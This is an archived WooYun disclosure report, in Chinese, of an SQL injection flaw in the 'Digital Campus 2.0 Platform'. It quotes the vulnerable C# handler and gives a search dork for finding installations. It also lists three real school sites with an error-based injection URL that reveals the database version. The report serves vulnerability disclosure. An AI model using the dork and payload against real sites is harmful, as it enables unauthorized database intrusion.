乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-17: 细节已通知厂商并且等待厂商处理中 2015-03-20: 厂商已经确认,细节仅向厂商公开 2015-03-23: 细节向第三方安全合作伙伴开放 2015-05-14: 细节向核心白帽子及相关领域专家公开 2015-05-24: 细节向普通白帽子公开 2015-06-03: 细节向实习白帽子公开 2015-06-18: 细节向公众公开
RT
关键词:intitle:数字校园平台—Digital Campus2.0 Platform
文件:code/application/book/syscommontypemanger.aspx代码:
public void GetDTreeJSON(){ SysCommonTypeManager sysCommonTypeManager = new SysCommonTypeManager(); string text = (base.Request.Form["SCTID"] == null) ? "" : base.Request.Form["SCTID"].ToString(); string request = base.GetRequest("params"); if (text != null) { DataTable dataTable = sysCommonTypeManager.GetMenuList(null, request, text, "").Tables[0]; SysModuleJSONHelper sysModuleJSONHelper = new SysModuleJSONHelper(); sysModuleJSONHelper.Reset(); sysModuleJSONHelper.set_success(true); if (dataTable != null && dataTable.Rows.Count > 0) { foreach (DataRow dataRow in dataTable.Rows) { sysModuleJSONHelper.AddItem("id", dataRow["ID"].ToString()); sysModuleJSONHelper.AddItem("text", dataRow["text"].ToString()); sysModuleJSONHelper.AddItem("leaf", dataRow["leaf"].ToString()); sysModuleJSONHelper.AddItem("parentid", dataRow["ParentID"].ToString()); sysModuleJSONHelper.ItemOk(); } } base.Response.Clear(); base.Response.Write(sysModuleJSONHelper.ToString()); } else { base.Response.Clear(); base.Response.Write("success:false"); }}
string request = base.GetRequest("params"); //没有过滤直接带入查询
案例1:
http://218.75.5.18/code/application/book/syscommontypemanger.aspx?params=1' and 1=@@version and '1'='1
案例2:
http://www.tzby.net/code/application/book/syscommontypemanger.aspx?params=1' and 1=@@version and '1'='1
案例3:
http://www.jszx.cn/code/application/book/syscommontypemanger.aspx?params=1' and 1=@@version and '1'='1
这里要注意的是,
string text = (base.Request.Form["SCTID"] == null) ? "" : base.Request.Form["SCTID"].ToString(); //SCTID和SCTID非空。
过滤参数啊。
危害等级:高
漏洞Rank:13
确认时间:2015-03-20 17:34
CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。
暂无